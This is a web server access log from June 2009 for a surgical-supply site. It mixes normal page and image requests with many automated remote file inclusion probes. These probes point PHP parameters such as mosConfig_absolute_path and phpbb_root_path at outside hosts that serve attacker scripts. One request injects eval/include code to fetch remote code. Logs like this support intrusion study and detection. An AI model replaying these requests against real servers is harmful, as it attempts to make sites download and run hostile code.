77.166.79.119 - - [04/Jun/2009:01:29:55 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Avant Browser)"
77.166.79.119 - - [04/Jun/2009:01:29:55 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Avant Browser)"
65.23.158.226 - - [04/Jun/2009:01:30:24 -0400] "GET //skin/zero_vote/login.php?dir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.221.130.11 - - [04/Jun/2009:01:30:25 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
77.221.130.11 - - [04/Jun/2009:01:30:25 -0400] "GET /logs/access_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
77.221.130.11 - - [04/Jun/2009:01:30:25 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
77.221.130.11 - - [04/Jun/2009:01:30:25 -0400] "GET /logs/access_log.Q109052200//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:01:30:28 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:01:30:28 -0400] "GET /logs/access_log.Q109051800//skin/zero_vote/login.php?dir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.186.84.66 - - [04/Jun/2009:01:30:46 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76103 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:48 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:49 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:49 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:49 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:49 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:50 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:50 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:51 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:51 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:51 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:51 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:52 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:52 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:53 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:53 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:30:53 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.59.12.99 - - [04/Jun/2009:01:31:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.231.1.113 - - [04/Jun/2009:01:31:05 -0400] "GET /phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:01:31:05 -0400] "GET /logs/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:01:31:05 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:01:31:09 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/login.php?dir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:01:31:36 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
218.185.20.88 - - [04/Jun/2009:01:32:02 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:32:02 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:32:04 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:32:04 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.231.1.113 - - [04/Jun/2009:01:32:12 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:01:32:13 -0400] "GET /logs/access_log.Q109051800//skin/zero_vote/login.php?dir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:01:32:13 -0400] "GET //skin/zero_vote/login.php?dir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:01:32:13 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:01:32:32 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:32:46 -0400] "GET /logs/error_log.Q109052800/include/lib.inc.php?site_path=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.162.28 - - [04/Jun/2009:01:32:46 -0400] "GET /include/lib.inc.php?site_path=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 217 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.162.28 - - [04/Jun/2009:01:32:47 -0400] "GET /logs/include/lib.inc.php?site_path=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 222 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.146.231.193 - - [04/Jun/2009:01:33:04 -0400] "GET /logs/error_log.Q108051300//?_zb_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
65.23.158.226 - - [04/Jun/2009:01:33:05 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/login.php?dir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.146.231.193 - - [04/Jun/2009:01:33:05 -0400] "GET //?_zb_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
218.146.231.193 - - [04/Jun/2009:01:33:06 -0400] "GET /logs//?_zb_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 200 4103 "-" "libwww-perl/5.65"
85.17.162.28 - - [04/Jun/2009:01:33:18 -0400] "GET /include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:33:20 -0400] "GET /logs/include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:33:20 -0400] "GET /logs/access_log.Q109051100/include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:33:34 -0400] "GET /logs/access_log.Q109051100/include/lib.inc.php?site_path=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 244 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
90.185.249.111 - - [04/Jun/2009:01:33:54 -0400] "GET /logs/access_log.Q109052300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:01:34:23 -0400] "GET /include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:01:34:23 -0400] "GET /logs/access_log.Q109051100/include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:01:34:23 -0400] "GET /logs/include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
91.149.157.130 - - [04/Jun/2009:01:35:24 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:01:35:24 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:01:35:24 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:01:35:27 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [04/Jun/2009:01:35:27 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [04/Jun/2009:01:35:27 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
121.165.73.157 - - [04/Jun/2009:01:36:04 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:01:36:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
199.120.90.222 - - [04/Jun/2009:01:36:08 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:36:09 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:36:09 -0400] "GET /logs/access_log.Q109051800//skin/zero_vote/ask_password.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:01:36:15 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:01:36:35 -0400] "GET /logs/access_log.Q109051100%20%20/include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
76.164.212.18 - - [04/Jun/2009:01:37:19 -0400] "GET /logs/access_log.Q109052300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
91.149.157.130 - - [04/Jun/2009:01:37:38 -0400] "GET /logs/error_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
211.144.136.88 - - [04/Jun/2009:01:37:43 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:37:46 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:37:46 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:37:48 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/ask_password.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
91.149.157.130 - - [04/Jun/2009:01:37:50 -0400] "GET /logs/error_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
218.146.231.193 - - [04/Jun/2009:01:37:52 -0400] "GET /logs/error_log.Q108033000//?_zb_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
216.17.99.13 - - [04/Jun/2009:01:37:55 -0400] "GET /plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:01:37:56 -0400] "GET /logs/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:01:37:56 -0400] "GET /logs/access_log.Q109010700/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:37:59 -0400] "GET /plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:38:00 -0400] "GET /logs/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:38:00 -0400] "GET /logs/access_log.Q109010700/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:38:07 -0400] "GET /plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:38:07 -0400] "GET /logs/access_log.Q109010700%20%20/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:38:07 -0400] "GET /logs/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:01:38:14 -0400] "GET /logs/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:01:38:15 -0400] "GET /plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:01:38:15 -0400] "GET /logs/access_log.Q109010700%20%20/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:38:17 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:38:17 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:38:20 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:38:20 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:38:22 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:38:22 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:38:22 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:01:38:34 -0400] "GET /logs/access_log.Q109052200%20%20/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:38:47 -0400] "GET /logs/access_log.Q109052200%20%20/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:38:49 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:38:49 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:38:49 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:38:53 -0400] "GET /logs/error_log.Q109051100/include/lib.inc.php?site_path=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.144.136.88 - - [04/Jun/2009:01:38:56 -0400] "GET /logs/access_log.Q109051000%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:39:18 -0400] "GET /logs/access_log.Q109051000%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:01:39:52 -0400] "GET /logs/access_log.Q109052900/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:01:39:52 -0400] "GET /logs/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:01:39:52 -0400] "GET /plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:01:39:59 -0400] "GET /logs/access_log.Q109052200/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:40:15 -0400] "GET /plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:40:15 -0400] "GET /logs/access_log.Q109052900/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
